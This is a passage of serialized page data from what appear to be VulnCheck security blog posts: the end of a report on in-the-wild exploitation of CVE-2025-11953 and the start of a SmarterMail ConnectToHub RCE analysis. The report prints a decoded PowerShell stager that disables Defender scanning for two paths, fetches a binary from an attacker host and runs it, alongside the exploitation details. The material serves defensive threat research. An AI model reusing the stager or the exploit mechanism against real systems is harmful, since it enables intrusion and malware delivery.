GMALwBxAHIAQQAxAGkAYQBSADgAZgB0AHYAVQB4AGMANQBvAHoAMgBHAG4AUQA9AD0AJwA=\"}\n",[886,14516,14514],{"__ignoreMap":219},[18,14518,14519],{},"When decoded, the PowerShell payload performs the following actions:",[1789,14521,14522,14525,14528,14535,14538],{},[25,14523,14524],{},"Adds Microsoft Defender exclusion paths for the current working directory and the system temporary directory",[25,14526,14527],{},"Establishes a raw TCP connection to an attacker-controlled host and port",[25,14529,14530,14531,14534],{},"Sends a ",[886,14532,14533],{},"GET \u002Fwindows"," request.",[25,14536,14537],{},"Writes the received data to a file in system's temporary directory",[25,14539,14540],{},"Executes the downloaded binary with a large argument string.",[18,14542,14543],{},"The decoded payload follows:",[1354,14545,14548],{"className":14546,"code":14547,"language":1359},[1357],"$currentDirectory = $(Get-Location).Path;\n$systemTempDirectory = [System.IO.Path]::GetTempPath();\n\nAdd-MpPreference -ExclusionPath $currentDirectory 2> $null;\nAdd-MpPreference -ExclusionPath $systemTempDirectory 2> $null;\n\n$tcpClient = New-Object System.Net.Sockets.TcpClient;\n$tcpClient.Connect(\"8.218.43.248\",60124);\n$tcpStream = $tcpClient.GetStream();\n$req = \"GET \u002Fwindows\";\n$reqb = [System.Text.Encoding]::UTF8.GetBytes($req);\n$tcpStream.Write($reqb,0,$reqb.Length);\n\n$execp = Join-Path -Path $systemTempDirectory -ChildPath jzDjiqKU.exe;\n$fileStream = [System.IO.File]::OpenWrite($execp);\n\n$buffer = New-Object byte[] 4096;\n$bytesRead = 0;\nwhile (($bytesRead = $tcpStream.Read($buffer, 0, $buffer.Length)) -gt 0) {\n $fileStream.Write($buffer, 0, $bytesRead);\n}\n$fileStream.Close();\n$tcpStream.Close();\n$tcpClient.Close();\nStart-Process -FilePath \"$execp\" -ArgumentList '3qhAImaLj74zHdyyGDQFsNsfLLuFhWMhX7CrsblBI3mXjrknG9y8AzUWu9weM7qNi2YsX7mnqLJHJGaWj6ssH9qkBzcCpNgdM7mLn2EkQLypv7xGOmWRj6UsGNqkBzMHsNsfLLuJhW86Q7mnsbxCOmWRhLErH9y4AiAEuN8BJbOSlGEnX7mmp7JHJGaXjKssH9ukBzIYu9seM7qKnG0iQL2mv7BFOmSTkrovH8O+BToAv9kePbiKi2YnRqauq7lfJmaXhr0lHtuqADAYu9ofM7mJlnkjRrKpr7lDJHeRi6UvHNqkBzQGpNwdJ72MlGMhUbmurKZAJGKLjbsoAdy9DzoPuNQWPbqNl3klQ7yxrLtfLGCfirssG9qqDi4Eu9UBL7iIi2IkS76vrrtBNGWUjqUkHcO7BjEYstoVK7uNlW80Q7qtsblALHmUjbkzHtqyDDgBvNwPL7mPi2E6Q7ymsblFJW2TibooD9+4BC4OssMeK7iSlG4sS76vrrpBNG+Ljb8tAd+6BC4AvtcZLLmPhWMjX7qrraZAJG+Li7onGd27BjcWvtoBL7+Pi2YjRqaurLlLImeUjL49HtmkBzAFpNwZKKWNlmAuRriqrahJOmWUi6UsFtWkBDECsNsfLLqNhW86Q7mnsbpDIXmRjrErH9y6ByACvcMdKbmSkG86SbylqbhAJG6FiLwzHdm5GDEEvcMeKbuGk2clRbu\u002FrrhGOmaSiKUoHcO4AToAutwbK6uNlGY6QLmxrrBfJW+Shr0tHt65FjQBpN8cJaWOl2M6QrmlqbhAJ26iK0gDBMpHeowJO0qc\u002FqrA1iaR8ftvUxc5oz2GnQ=='\n",[886,14549,14547],{"__ignoreMap":219},[18,14551,14552],{},"This same methodology was observed across multiple attacks. The deliberate disabling of Microsoft Defender protections before payload retrieval indicates the attacker anticipated the presence of endpoint security controls and incorporated evasion measures into the initial execution flow.",[18,14554,14555,14556,14561,14562,14567],{},"The downloaded binary is UPX-packed (SHA-256: ",[47,14557,14560],{"href":14558,"rel":14559},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fd8337df3aff749250557bf11daf069eb404cce0e6f4f91c6bd6d3f78aed6e9d6",[51],"d8337df3aff749250557bf11daf069eb404cce0e6f4f91c6bd6d3f78aed6e9d6","), but once unpacked (SHA-256: ",[47,14563,14566],{"href":14564,"rel":14565},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F7ecbb0cc88dfa5f187c209a28bd25e8e2d5113bb898a91ae273bca5983130886",[51],"7ecbb0cc88dfa5f187c209a28bd25e8e2d5113bb898a91ae273bca5983130886","), the payload is revealed to be a Rust-based binary that incorporates basic anti-analysis logic, including runtime checks intended to hinder static inspection.",[18,14569,14570],{},"VulnCheck observed attacks originating from 65.109.182.231, 223.6.249.141, and 134.209.69.155, with the \"windows\" payload hosted at 8.218.43.248:60124 and 47.86.33.195:60130. The same infrastructure also hosted a corresponding binary named \"linux\".",[993,14572,14574],{"id":14573},"why-early-exploitation-matters",[295,14575,14576],{},"Why Early Exploitation Matters",[18,14578,14579],{},"The most important aspect of this activity is not the payloads or the infrastructure involved, but the timeline. VulnCheck observed exploitation attempts in December. As of late January, public discussion largely frames CVE-2025-11953 as a theoretical risk rather than an active intrusion vector. This disconnect is where defenders are most likely to be caught unprepared.",[18,14581,14582],{},"Attackers do not wait for KEV listings, vendor summaries, or consensus narratives. Once proof-of-concept code exists and scanning is viable, exploitation follows quickly. Developer tooling is particularly attractive because it is widespread, inconsistently monitored, and rarely treated as a production-grade attack surface.",[993,14584,14586],{"id":14585},"closing",[295,14587,14588],{},"Closing",[18,14590,14591],{},"CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent.",[18,14593,14594],{},"Organizations cannot afford to wait for CISA KEV inclusion, vendor reports, or broad consensus before taking action. Exploitation often begins as soon as exposure exists. Identifying those gaps early is critical to reducing attacker dwell time and preventing opportunistic compromise.",[18,14596,14597],{},"This is exactly the class of activity VulnCheck Canaries are designed to surface, and why VulnCheck KEV tracks real-world exploitation as it happens instead of after narratives solidify. It is a prerequisite for defending modern infrastructure.",[993,14599,14600],{"id":10611},[295,14601,10612],{},[14603,14604,14606],"h4",{"id":14605},"network-infrastructure",[295,14607,14608],{},"Network Infrastructure",[307,14610,14611,14620],{},[310,14612,14613],{},[313,14614,14615,14617],{},[316,14616,2126],{},[316,14618,14619],{},"Observed Role",[336,14621,14622,14630,14637,14644,14652],{},[313,14623,14624,14627],{},[341,14625,14626],{},"65.109.182.231",[341,14628,14629],{},"Exploitation source",[313,14631,14632,14635],{},[341,14633,14634],{},"223.6.249.141",[341,14636,14629],{},[313,14638,14639,14642],{},[341,14640,14641],{},"134.209.69.155",[341,14643,14629],{},[313,14645,14646,14649],{},[341,14647,14648],{},"8.218.43.248",[341,14650,14651],{},"Payload host (Windows)",[313,14653,14654,14657],{},[341,14655,14656],{},"47.86.33.195",[341,14658,14659],{},"Payload host (Windows and Linux)",[14603,14661,14663],{"id":14662},"file-hashes",[295,14664,14665],{},"File Hashes",[307,14667,14668,14677],{},[310,14669,14670],{},[313,14671,14672,14675],{},[316,14673,14674],{},"SHA-256 Hash",[316,14676,10625],{},[336,14678,14679,14686,14693,14701],{},[313,14680,14681,14683],{},[341,14682,14560],{},[341,14684,14685],{},"UPX-packed Windows payload",[313,14687,14688,14690],{},[341,14689,14566],{},[341,14691,14692],{},"Unpacked Windows payload",[313,14694,14695,14698],{},[341,14696,14697],{},"d1886b189474b02467ed2845df0938cec9785e99c3d4b04e0b7de3cafbee4182",[341,14699,14700],{},"UPX-packed Linux payload",[313,14702,14703,14706],{},[341,14704,14705],{},"6686d4baa9d483da27ba84dab85e96e42b790b608571de7bcb07a1fd7c975fe3",[341,14707,14708],{},"Unpacked Linux payload",[61,14710,202],{"id":201},[18,14712,10768,14713,1246,14716,10775,14719,10779,14722,1246,14727,1246,14732,59],{},[47,14714,283],{"href":281,"rel":14715},[51],[47,14717,216],{"href":1258,"rel":14718},[51],[47,14720,1251],{"href":1249,"rel":14721},[51],[47,14723,14725],{"href":10782,"rel":14724},[51],[1131,14726,10786],{},[47,14728,14730],{"href":10789,"rel":14729},[51],[1131,14731,10793],{},[47,14733,10798,14735],{"href":10796,"rel":14734},[51],[1131,14736,10801],{},[18,14738,1228,14739,1234,14742,1240,14745,1246,14748,1246,14751,1255,14754,1260],{},[47,14740,1233],{"href":10806,"rel":14741},[51],[47,14743,1239],{"href":1237,"rel":14744},[51],[47,14746,1245],{"href":1243,"rel":14747},[51],[47,14749,1251],{"href":1249,"rel":14750},[51],[47,14752,283],{"href":281,"rel":14753},[51],[47,14755,216],{"href":1258,"rel":14756},[51],{"title":219,"searchDepth":220,"depth":220,"links":14758},[14759,14760,14761,14762,14763,14764],{"id":14473,"depth":1266,"text":14476},{"id":14497,"depth":1266,"text":14500},{"id":14573,"depth":1266,"text":14576},{"id":14585,"depth":1266,"text":14588},{"id":10611,"depth":1266,"text":10612},{"id":201,"depth":220,"text":202},"VulnCheck observed in-the-wild exploitation of CVE-2025-11953 targeting exposed React Native Metro servers shortly after public disclosure. Analysis of repeated attacks shows consistent, operational payload delivery rather than opportunistic scanning. This post examines how the vulnerability was exploited and why early exploitation visibility matters for defenders.",{"slug":14767},"metro4shell_eitw","\u002Fblog\u002Fmetro4shell_eitw",{"title":11601,"description":14765},"blog\u002Fmetro4shell_eitw",[242,1279,2941,1281],"Rj-NLcl6eP2RWLU42GiRxdlqjalsTk49MBxmRzNSfPM",{"id":14774,"title":10344,"articles":14775,"authors":14786,"body":14788,"date":19464,"description":19465,"extension":234,"image":7,"link":7,"meta":19466,"navigation":237,"path":19468,"seo":19469,"series":7,"stem":19470,"subtype":7,"tags":19471,"__hash__":19472},"blog\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423.md",[14776,14780,14783],{"title":14777,"source":14378,"link":14778,"date":14779},"Critical SmarterMail Vulnerability Exploited in Ransomware Attacks","https:\u002F\u002Fwww.securityweek.com\u002Fcritical-smartermail-vulnerability-exploited-in-ransomware-attacks\u002F","2026-02-06",{"title":14781,"source":14373,"link":14782,"date":14779},"CISA warns of SmarterMail RCE flaw used in ransomware attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcisa-warns-of-smartermail-rce-flaw-used-in-ransomware-attacks\u002Famp\u002F",{"title":14784,"source":14390,"link":14785,"date":14779},"U.S. CISA adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog","https:\u002F\u002Fsecurityaffairs.com\u002F187675\u002Fsecurity\u002Fu-s-cisa-adds-smartertools-smartermail-and-react-native-community-cli-flaws-to-its-known-exploited-vulnerabilities-catalog.html",[14787],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":14789,"toc":19458},[14790,14804,14846,14863,14867,14874,14896,14899,14905,14914,14916,14925,15194,15208,15221,16257,16266,16687,16694,17582,17592,19017,19020,19254,19260,19388,19391,19397,19407,19410,19419,19421,19438,19455],[18,14791,14792,14793,14798,14799,14803],{},"VulnCheck’s security research team identified an unauthenticated remote code execution vulnerability in SmarterTools SmarterMail, which we disclosed to the software supplier in accordance with VulnCheck’s vulnerability disclosure ",[47,14794,14797],{"href":14795,"rel":14796},"https:\u002F\u002Fwww.vulncheck.com\u002Fvulnerability-disclosure-policy",[51],"policy",". The vulnerability, which VulnCheck has assigned ",[47,14800,674],{"href":14801,"rel":14802},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories\u002Fsmartertools-smartermail-unauthenticated-rce-via-connecttohub-api",[51],", arises from the ability to execute arbitrary commands in the mounting logic and was discovered independently by at least four different researchers:",[22,14805,14806,14824,14836],{},[25,14807,14808,14813,14814,905,14819],{},[47,14809,14812],{"href":14810,"rel":14811},"https:\u002F\u002Fx.com\u002FSinSinology",[51],"Sina Kheirkhah"," & ",[47,14815,14818],{"href":14816,"rel":14817},"https:\u002F\u002Fx.com\u002FchudyPB",[51],"Piotr Bazydlo",[47,14820,14823],{"href":14821,"rel":14822},"https:\u002F\u002Flabs.watchtowr.com\u002F",[51],"watchTowr",[25,14825,14826,905,14831],{},[47,14827,14830],{"href":14828,"rel":14829},"https:\u002F\u002Fcode-white.com\u002Fcredits\u002Fmarkus-wulftange\u002F",[51],"Markus Wulftange",[47,14832,14835],{"href":14833,"rel":14834},"https:\u002F\u002Fcode-white.com\u002Fpublic-vulnerability-list\u002F#systemadminsettingscontrollerconnecttohub-missing-authentication-in-smartermail",[51],"CODE WHITE GmbH",[25,14837,14838,905,14842],{},[47,14839,4410],{"href":14840,"rel":14841},"https:\u002F\u002Finfosec.exchange\u002F@yeslikethefood",[51],[47,14843,2709],{"href":14844,"rel":14845},"https:\u002F\u002Fwww.vulncheck.com\u002F",[51],[18,14847,14848,14849,14854,14855,14859,14860,59],{},"CVE-2026-24423 allows unauthenticated RCE via the ConnectToHub API endpoint. The vendor notified VulnCheck that the issue was patched in a January 15, 2026 release of SmarterMail (Build 9511), whose ",[47,14850,14853],{"href":14851,"rel":14852},"https:\u002F\u002Fwww.smartertools.com\u002Fsmartermail\u002Frelease-notes\u002Fcurrent",[51],"release notes"," highlight the presence of a critical security issue. The vulnerability is also noted on CODE WHITE GmbH’s “",[47,14856,14858],{"href":14833,"rel":14857},[51],"Public Vulnerability List",".” VulnCheck’s advisory for CVE-2026-24423 is ",[47,14861,305],{"href":14801,"rel":14862},[51],[61,14864,14866],{"id":14865},"cve-2026-24423-smartermail-connecttohub-unauth-rce","CVE-2026-24423: SmarterMail ConnectToHub Unauth RCE",[18,14868,14869,14870,14873],{},"The SmarterTools SmarterMail server prior to version 100.0.9511 is vulnerable to an unauthenticated remote code execution using the ConnectToHub API. The vulnerable API endpoint (",[886,14871,14872],{},"\u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub",") does not require authentication and configures the mounted path of the server. This mount command is controlled by the remote server, and arbitrary commands are defined as helpers to mount on all supported platforms.",[18,14875,2245,14876,14879,14880,14883,14884,14887,14888,14891,14892,14895],{},[886,14877,14878],{},"connect-to-hub"," endpoint processes remote addresses in the ",[886,14881,14882],{},"hubAddress"," parameter and requests ",[886,14885,14886],{},"\u002Fweb\u002Fapi\u002Fnode-management\u002Fsetup-initial-connection"," (or in older versions, ",[886,14889,14890],{},"\u002Fweb\u002Fapi\u002Fhub-connection\u002Fsetup-initial-connection",") on the attacker-controlled server. The server then responds with a JSON object that includes the ",[886,14893,14894],{},"CommandMount"," parameter, which will allow the adversary to define arbitrary command execution parameters and, if the parameter checks are satisfied, will execute commands on all platforms.",[18,14897,14898],{},"Because it wouldn’t be VulnCheck research without shells, we’ll start with the RCE evidence before jumping into the analysis. The below figure shows execution on the Windows install of SmarterMail:",[18,14900,14901],{},[68,14902],{"alt":14903,"src":14904},"SmarterMail ConnectToHub RCE PoC for Windows","\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423\u002Fsmartermail-rce-windows.png",[18,14906,14907,14908,14910],{},"And the below figure shows execution on the Docker container image provided by SmarterMail:",[1823,14909],{},[68,14911],{"alt":14912,"src":14913},"SmarterMail ConnectToHub RCE PoC for Linux","\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423\u002Fsmartermail-rce-linux.png",[993,14915,4541],{"id":4540},[18,14917,2245,14918,14920,14921,14924],{},[886,14919,14878],{}," API endpoint defined in the ",[886,14922,14923],{},"MailService.dll"," explicitly allows anonymous users and processes JSON data sent in POST requests:",[1354,14926,14930],{"className":14927,"code":14928,"language":14929,"meta":219,"style":219},"language-csharp shiki shiki-themes material-theme-lighter github-light github-dark monokai","[ShortDescription(\"Attempts to connect this node to a hub\")]\n[Description(\"Attempts to connect this node to a hub.\")]\n[AuthenticatedService(AllowAnonymous = true)]\n[HttpPost]\n[Route(\"connect-to-hub\")]\npublic async Task\u003CActionResult\u003CConnectToHubResult>> ConnectToHub([FromBody] ConnectToHubInput input)\n{\n AdministrativeLog.Log(\"Connecting to hub\", LogLevels.Normal, base.HttpContext);\n ConnectToHubResult connectToHubResult = await SystemSettingsService.ConnectToHub(input);\n ConnectToHubResult connectToHubResult2 = connectToHubResult;\n connectToHubResult2.machineName = HAClusterConfig.Instance.LocalName;\n return base.CreateResponseMessage(connectToHubResult2);\n}\n","csharp",[886,14931,14932,14952,14969,14989,14998,15015,15059,15063,15104,15132,15145,15172,15190],{"__ignoreMap":219},[1373,14933,14934,14936,14940,14942,14944,14947,14949],{"class":1375,"line":1376},[1373,14935,7035],{"class":1383},[1373,14937,14939],{"class":14938},"sKvfc","ShortDescription",[1373,14941,1384],{"class":1383},[1373,14943,183],{"class":1387},[1373,14945,14946],{"class":1391},"Attempts to connect this node to a hub",[1373,14948,183],{"class":1387},[1373,14950,14951],{"class":1383},")]\n",[1373,14953,14954,14956,14958,14960,14962,14965,14967],{"class":1375,"line":220},[1373,14955,7035],{"class":1383},[1373,14957,10625],{"class":14938},[1373,14959,1384],{"class":1383},[1373,14961,183],{"class":1387},[1373,14963,14964],{"class":1391},"Attempts to connect this node to a hub.",[1373,14966,183],{"class":1387},[1373,14968,14951],{"class":1383},[1373,14970,14971,14973,14976,14978,14981,14983,14987],{"class":1375,"line":1266},[1373,14972,7035],{"class":1383},[1373,14974,14975],{"class":14938},"AuthenticatedService",[1373,14977,1384],{"class":1383},[1373,14979,14980],{"class":9372},"AllowAnonymous",[1373,14982,8575],{"class":1397},[1373,14984,14986],{"class":14985},"s8HiA"," true",[1373,14988,14951],{"class":1383},[1373,14990,14991,14993,14996],{"class":1375,"line":1852},[1373,14992,7035],{"class":1383},[1373,14994,14995],{"class":14938},"HttpPost",[1373,14997,7103],{"class":1383},[1373,14999,15000,15002,15005,15007,15009,15011,15013],{"class":1375,"line":4692},[1373,15001,7035],{"class":1383},[1373,15003,15004],{"class":14938},"Route",[1373,15006,1384],{"class":1383},[1373,15008,183],{"class":1387},[1373,15010,14878],{"class":1391},[1373,15012,183],{"class":1387},[1373,15014,14951],{"class":1383},[1373,15016,15017,15020,15023,15026,15028,15031,15033,15036,15039,15042,15045,15048,15051,15054,15057],{"class":1375,"line":4724},[1373,15018,15019],{"class":4652},"public",[1373,15021,15022],{"class":4652}," async",[1373,15024,15025],{"class":14938}," Task",[1373,15027,11852],{"class":1383},[1373,15029,15030],{"class":14938},"ActionResult",[1373,15032,11852],{"class":1383},[1373,15034,15035],{"class":14938},"ConnectToHubResult",[1373,15037,15038],{"class":1383},">>",[1373,15040,15041],{"class":7297}," ConnectToHub",[1373,15043,15044],{"class":1383},"([",[1373,15046,15047],{"class":14938},"FromBody",[1373,15049,15050],{"class":1383},"]",[1373,15052,15053],{"class":14938}," ConnectToHubInput",[1373,15055,15056],{"class":9372}," input",[1373,15058,11875],{"class":1383},[1373,15060,15061],{"class":1375,"line":4756},[1373,15062,8904],{"class":1383},[1373,15064,15065,15068,15070,15073,15075,15077,15080,15082,15084,15087,15089,15092,15094,15097,15099,15102],{"class":1375,"line":4768},[1373,15066,15067],{"class":4640}," AdministrativeLog",[1373,15069,59],{"class":1383},[1373,15071,15072],{"class":7297},"Log",[1373,15074,1384],{"class":1383},[1373,15076,183],{"class":1387},[1373,15078,15079],{"class":1391},"Connecting to hub",[1373,15081,183],{"class":1387},[1373,15083,5437],{"class":1383},[1373,15085,15086],{"class":4640}," LogLevels",[1373,15088,59],{"class":1383},[1373,15090,15091],{"class":4640},"Normal",[1373,15093,5437],{"class":1383},[1373,15095,15096],{"class":6761}," base",[1373,15098,59],{"class":1383},[1373,15100,15101],{"class":4640},"HttpContext",[1373,15103,4680],{"class":1383},[1373,15105,15106,15109,15112,15114,15117,15120,15122,15125,15127,15130],{"class":1375,"line":4792},[1373,15107,15108],{"class":14938}," ConnectToHubResult",[1373,15110,15111],{"class":9372}," connectToHubResult",[1373,15113,8575],{"class":1397},[1373,15115,15116],{"class":1397}," await",[1373,15118,15119],{"class":4640}," SystemSettingsService",[1373,15121,59],{"class":1383},[1373,15123,15124],{"class":7297},"ConnectToHub",[1373,15126,1384],{"class":1383},[1373,15128,15129],{"class":4640},"input",[1373,15131,4680],{"class":1383},[1373,15133,15134,15136,15139,15141,15143],{"class":1375,"line":4798},[1373,15135,15108],{"class":14938},[1373,15137,15138],{"class":9372}," connectToHubResult2",[1373,15140,8575],{"class":1397},[1373,15142,15111],{"class":4640},[1373,15144,4912],{"class":1383},[1373,15146,15147,15150,15152,15155,15157,15160,15162,15165,15167,15170],{"class":1375,"line":4806},[1373,15148,15149],{"class":4640}," connectToHubResult2",[1373,15151,59],{"class":1383},[1373,15153,15154],{"class":4640},"machineName ",[1373,15156,5417],{"class":1397},[1373,15158,15159],{"class":4640}," HAClusterConfig",[1373,15161,59],{"class":1383},[1373,15163,15164],{"class":4640},"Instance",[1373,15166,59],{"class":1383},[1373,15168,15169],{"class":4640},"LocalName",[1373,15171,4912],{"class":1383},[1373,15173,15174,15176,15178,15180,15183,15185,15188],{"class":1375,"line":4817},[1373,15175,7340],{"class":4636},[1373,15177,15096],{"class":6761},[1373,15179,59],{"class":1383},[1373,15181,15182],{"class":7297},"CreateResponseMessage",[1373,15184,1384],{"class":1383},[1373,15186,15187],{"class":4640},"connectToHubResult2",[1373,15189,4680],{"class":1383},[1373,15191,15192],{"class":1375,"line":4825},[1373,15193,1855],{"class":1383},[18,15195,15196,15197,15199,15200,15203,15204,15207],{},"The task processes the JSON, checks for a set of values with light validation, and then makes a request to the value set for ",[886,15198,14882],{}," and decodes the JSON response. If the correct parameters are set, ",[886,15201,15202],{},"MountConfiguration.Mount(decodedObject.SystemMount, true)"," is run with the JSON object ",[886,15205,15206],{},"SystemMount"," containing the following parameters:",[22,15209,15210,15213,15216,15219],{},[25,15211,15212],{},"Enabled",[25,15214,15215],{},"ReadOnly",[25,15217,15218],{},"MountPath",[25,15220,14894],{},[1354,15222,15224],{"className":14927,"code":15223,"language":14929,"meta":219,"style":219},"public static async Task\u003CConnectToHubResult> ConnectToHub(ConnectToHubInput input)\n{\n ConnectToHubResult connectToHubResult;\n using (HttpClient client = new HttpClient())\n {\n try\n {\n var \u003C>f__AnonymousType = new\n {\n hubAddress = input.hubAddress,\n oneTimePassword = input.oneTimePassword,\n nodeName = NodeHAClusterConfig.Instance.LocalName\n };\n string text = JsonConvert.SerializeObject(\u003C>f__AnonymousType);\n string text2 = input.hubAddress.TrimEnd('\u002F');\n string text3 = text2 + \"\u002Fweb\u002Fapi\u002Fnode-management\u002Fsetup-initial-connection\";\n Console.WriteLine(\"Connecting to hub with full URL: \" + text3 + \" with parameters:\\r\\n\" + text);\n HttpResponseMessage httpResponseMessage = await client.PostAsync(new Uri(text3), new StringContent(text, Encoding.UTF8, \"application\u002Fjson\"));\n HttpResponseMessage httpResponseMessage2 = httpResponseMessage;\n string text4 = await httpResponseMessage2.Content.ReadAsStringAsync();\n Console.WriteLine(\"Connecting to hub results: \" + text4);\n SystemSettingsService.InitialConnectionResult decodedObject = JsonConvert.DeserializeObject\u003CSystemSettingsService.InitialConnectionResult>(text4);\n if (decodedObject != null)\n {\n NodeHAClusterConfig haSettings = NodeHAClusterConfig.Instance;\n string sharedSecret = decodedObject.SharedSecret;\n Guid clusterId = decodedObject.ClusterId;\n Dictionary\u003Cstring, string> targetHubs = decodedObject.TargetHubs;\n bool isStandby = decodedObject.IsStandby;\n try\n {\n JObject settings = new JObject();\n if (clusterId != Guid.Empty)\n {\n settings[\"ClusterId\"] = clusterId.ToString();\n }\n settings[\"SharedSecret\"] = sharedSecret;\n object obj;\n if (targetHubs == null)\n {\n obj = null;\n }\n else\n {\n obj = targetHubs.ToDictionary((KeyValuePair\u003Cstring, string> k) => k.Key, (KeyValuePair\u003Cstring, string> v) => v.Value);\n }\n settings[\"TargetHubs\"] = JObject.FromObject(obj ?? new Dictionary\u003Cstring, string>());\n if (!isStandby)\n {\n if (!(await MountConfiguration.Mount(decodedObject.SystemMount, true)).success)\n {\n return new ConnectToHubResult\n {\n message = \"Failed to mount system mount point\",\n success = false\n };\n }\n FileManager.SetNewApplicationDataPath(Path.Combine(decodedObject.SystemMount.MountPath, \"System\"));\n }\n\n\n",[886,15225,15226,15254,15258,15266,15289,15293,15298,15302,15318,15322,15337,15353,15372,15377,15404,15434,15457,15500,15565,15578,15604,15627,15666,15683,15687,15705,15724,15743,15774,15793,15798,15803,15820,15842,15847,15873,15878,15899,15909,15925,15929,15940,15944,15949,15953,16028,16033,16081,16096,16101,16145,16151,16162,16168,16185,16196,16202,16208,16252],{"__ignoreMap":219},[1373,15227,15228,15230,15233,15235,15237,15239,15241,15243,15245,15247,15250,15252],{"class":1375,"line":1376},[1373,15229,15019],{"class":4652},[1373,15231,15232],{"class":4652}," static",[1373,15234,15022],{"class":4652},[1373,15236,15025],{"class":14938},[1373,15238,11852],{"class":1383},[1373,15240,15035],{"class":14938},[1373,15242,5384],{"class":1383},[1373,15244,15041],{"class":7297},[1373,15246,1384],{"class":1383},[1373,15248,15249],{"class":14938},"ConnectToHubInput",[1373,15251,15056],{"class":9372},[1373,15253,11875],{"class":1383},[1373,15255,15256],{"class":1375,"line":220},[1373,15257,8904],{"class":1383},[1373,15259,15260,15262,15264],{"class":1375,"line":1266},[1373,15261,15108],{"class":14938},[1373,15263,15111],{"class":9372},[1373,15265,4912],{"class":1383},[1373,15267,15268,15271,15273,15276,15279,15281,15284,15287],{"class":1375,"line":1852},[1373,15269,15270],{"class":4636}," using",[1373,15272,4641],{"class":1383},[1373,15274,15275],{"class":14938},"HttpClient",[1373,15277,15278],{"class":9372}," client",[1373,15280,8575],{"class":1397},[1373,15282,15283],{"class":1397}," new",[1373,15285,15286],{"class":14938}," HttpClient",[1373,15288,11781],{"class":1383},[1373,15290,15291],{"class":1375,"line":4692},[1373,15292,9613],{"class":1383},[1373,15294,15295],{"class":1375,"line":4724},[1373,15296,15297],{"class":4636}," try\n",[1373,15299,15300],{"class":1375,"line":4756},[1373,15301,9788],{"class":1383},[1373,15303,15304,15307,15310,15313,15315],{"class":1375,"line":4768},[1373,15305,15306],{"class":4640}," var ",[1373,15308,15309],{"class":1397},"\u003C>",[1373,15311,15312],{"class":4640},"f__AnonymousType ",[1373,15314,5417],{"class":1397},[1373,15316,15317],{"class":1397}," new\n",[1373,15319,15320],{"class":1375,"line":4792},[1373,15321,9814],{"class":1383},[1373,15323,15324,15327,15329,15331,15333,15335],{"class":1375,"line":4798},[1373,15325,15326],{"class":4640}," hubAddress ",[1373,15328,5417],{"class":1397},[1373,15330,15056],{"class":4640},[1373,15332,59],{"class":1383},[1373,15334,14882],{"class":4640},[1373,15336,9062],{"class":1383},[1373,15338,15339,15342,15344,15346,15348,15351],{"class":1375,"line":4806},[1373,15340,15341],{"class":4640}," oneTimePassword ",[1373,15343,5417],{"class":1397},[1373,15345,15056],{"class":4640},[1373,15347,59],{"class":1383},[1373,15349,15350],{"class":4640},"oneTimePassword",[1373,15352,9062],{"class":1383},[1373,15354,15355,15358,15360,15363,15365,15367,15369],{"class":1375,"line":4817},[1373,15356,15357],{"class":4640}," nodeName ",[1373,15359,5417],{"class":1397},[1373,15361,15362],{"class":4640}," NodeHAClusterConfig",[1373,15364,59],{"class":1383},[1373,15366,15164],{"class":4640},[1373,15368,59],{"class":1383},[1373,15370,15371],{"class":4640},"LocalName\n",[1373,15373,15374],{"class":1375,"line":4825},[1373,15375,15376],{"class":1383}," };\n",[1373,15378,15379,15382,15385,15387,15390,15392,15395,15397,15399,15402],{"class":1375,"line":4835},[1373,15380,15381],{"class":1397}," string",[1373,15383,15384],{"class":9372}," text",[1373,15386,8575],{"class":1397},[1373,15388,15389],{"class":4640}," JsonConvert",[1373,15391,59],{"class":1383},[1373,15393,15394],{"class":7297},"SerializeObject",[1373,15396,1384],{"class":1383},[1373,15398,15309],{"class":1397},[1373,15400,15401],{"class":4640},"f__AnonymousType",[1373,15403,4680],{"class":1383},[1373,15405,15406,15408,15411,15413,15415,15417,15419,15421,15424,15426,15428,15430,15432],{"class":1375,"line":4843},[1373,15407,15381],{"class":1397},[1373,15409,15410],{"class":9372}," text2",[1373,15412,8575],{"class":1397},[1373,15414,15056],{"class":4640},[1373,15416,59],{"class":1383},[1373,15418,14882],{"class":4640},[1373,15420,59],{"class":1383},[1373,15422,15423],{"class":7297},"TrimEnd",[1373,15425,1384],{"class":1383},[1373,15427,1388],{"class":1387},[1373,15429,2180],{"class":1391},[1373,15431,1388],{"class":1387},[1373,15433,4680],{"class":1383},[1373,15435,15436,15438,15441,15443,15446,15449,15451,15453,15455],{"class":1375,"line":4849},[1373,15437,15381],{"class":1397},[1373,15439,15440],{"class":9372}," text3",[1373,15442,8575],{"class":1397},[1373,15444,15445],{"class":4640}," text2 ",[1373,15447,15448],{"class":1397},"+",[1373,15450,4883],{"class":1387},[1373,15452,14886],{"class":1391},[1373,15454,183],{"class":1387},[1373,15456,4912],{"class":1383},[1373,15458,15459,15462,15464,15467,15469,15471,15474,15476,15479,15482,15484,15486,15489,15492,15494,15496,15498],{"class":1375,"line":4877},[1373,15460,15461],{"class":4640}," Console",[1373,15463,59],{"class":1383},[1373,15465,15466],{"class":7297},"WriteLine",[1373,15468,1384],{"class":1383},[1373,15470,183],{"class":1387},[1373,15472,15473],{"class":1391},"Connecting to hub with full URL: ",[1373,15475,183],{"class":1387},[1373,15477,15478],{"class":1397}," +",[1373,15480,15481],{"class":4640}," text3 ",[1373,15483,15448],{"class":1397},[1373,15485,4883],{"class":1387},[1373,15487,15488],{"class":1391}," with 